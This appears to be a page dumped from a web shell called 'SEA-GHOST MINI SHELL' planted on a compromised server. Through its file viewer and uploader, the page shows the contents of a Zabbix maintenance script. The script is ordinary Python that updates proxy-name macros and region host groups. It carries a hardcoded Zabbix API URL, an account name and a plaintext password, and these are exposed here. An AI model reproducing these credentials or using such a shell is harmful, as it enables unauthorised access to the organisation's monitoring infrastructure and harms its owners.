[ SEA-GHOST MINI SHELL]

Path : /proc/2/cwd/proc/2/cwd/var/lib/zabbix/
FILE UPLOADER :
Current File : //proc/2/cwd/proc/2/cwd/var/lib/zabbix/fix_proxy_name_in_macros.py

#!/usr/bin/env python
"""
This script getshost's proxy name using Zabbix API and corrects the Server
and ServerActive options. If any changes were done - it restarts zabbix agent
"""
import json
import sys
import urllib2

ZBX_URL = "https://zabbix.au.ds.network/api_jsonrpc.php"
ZBX_USER = "monitoring-ldap-read"
ZBX_PASS = "asd@#4sd3S#s3S!d56"
MACRO_NAME = "{$BY_PROXY_NAME}"
GROUPS = {'Region SIN03/01': 154, 'Region SYD01/01': 119, 'Region PER01/01': 158, 'Region PER01/02': 162, 'Region LON01/01': 167, 'Region LON01/02': 168}


def api_request(method, params, auth=None):
    """This function is used for API requests"""
    data = {
        "jsonrpc": "2.0",
        "method": method,
        "params": params,
        "id": 1,
        "auth": auth
    }
    req = urllib2.Request(
        ZBX_URL,
        data=json.dumps(data).encode(),
        headers={'Content-type': 'application/json'}
    )
    try:
        response = urllib2.urlopen(req)
        result = response.read()
        return json.loads(result)['result']
    except urllib2.HTTPError:
        print "Please check URL"
        sys.exit(1)
    except KeyError:
        print "Please check USER/PASS"
        sys.exit(1)


def main():
    params = {"user": ZBX_USER, "password": ZBX_PASS}
    auth = api_request("user.login", params)

    params = {"selectGroups": "extend"}
    hosts = api_request("host.get", params, auth)

    # We will cache proxy names to reduce API calls
    proxy_dict = {}

    for host in hosts:
        proxy_id = host['proxy_hostid']
        if int(proxy_id) != 0:
            try:
                proxy_name = proxy_dict[proxy_id]
            except KeyError:
                params = {"output": "extend", "proxyids": proxy_id}
                proxy = api_request("proxy.get", params, auth)
                proxy_name = proxy[0]['host']
                proxy_dict[proxy_id] = proxy_name
        else:
            # print('Host {} is not monitored by proxy'.format(host['host']))
            continue


        # Update/create user macro
        params = {"hostids": host['hostid']}
        macroses = api_request("usermacro.get", params, auth)
        existing = filter(lambda macro: macro['macro'] == MACRO_NAME, macroses)
        if existing:
            macro = existing[0]
            if macro['value'] != proxy_name:
                params = {"hostmacroid": macro["hostmacroid"], "value": proxy_name}
                update_macro = api_request("usermacro.update", params, auth)
                # print('Updated macro on host {}'.format(host['host']))
        else:
            params = {"hostid": host['hostid'], "macro": MACRO_NAME, "value": proxy_name}
            create_macro = api_request("usermacro.create", params, auth)
            # print('Created macro on host {}'.format(host['host']))

        # Update/create region group
        proxy_name_split = proxy_name.split('.')
        proxy_region = proxy_name_split[1]
        proxy_index = proxy_name_split[0][-2:]
        proxy_group = 'Region {0}/{1}'.format(proxy_region.upper(), proxy_index)
        # Retrieve only groups which contain word Region
        new_groups = []
        update = False
        for group in host['groups']:
            if group['name'].startswith('Region'):
                if group['name'] != proxy_group:
                    update = True
                    new_groups.append({"groupid": GROUPS[proxy_group]})
            else:
                new_groups.append({"groupid": group['groupid']})
        if update:
            params = {"hostid": host['hostid'], "groups": new_groups}
            update_group = api_request("host.update", params, auth)
            #print('Updated groups on host {}'.format(host['host']))

if __name__ == "__main__":
    main()


SEA-GHOST - SHELL CODING BY SEA-GHOST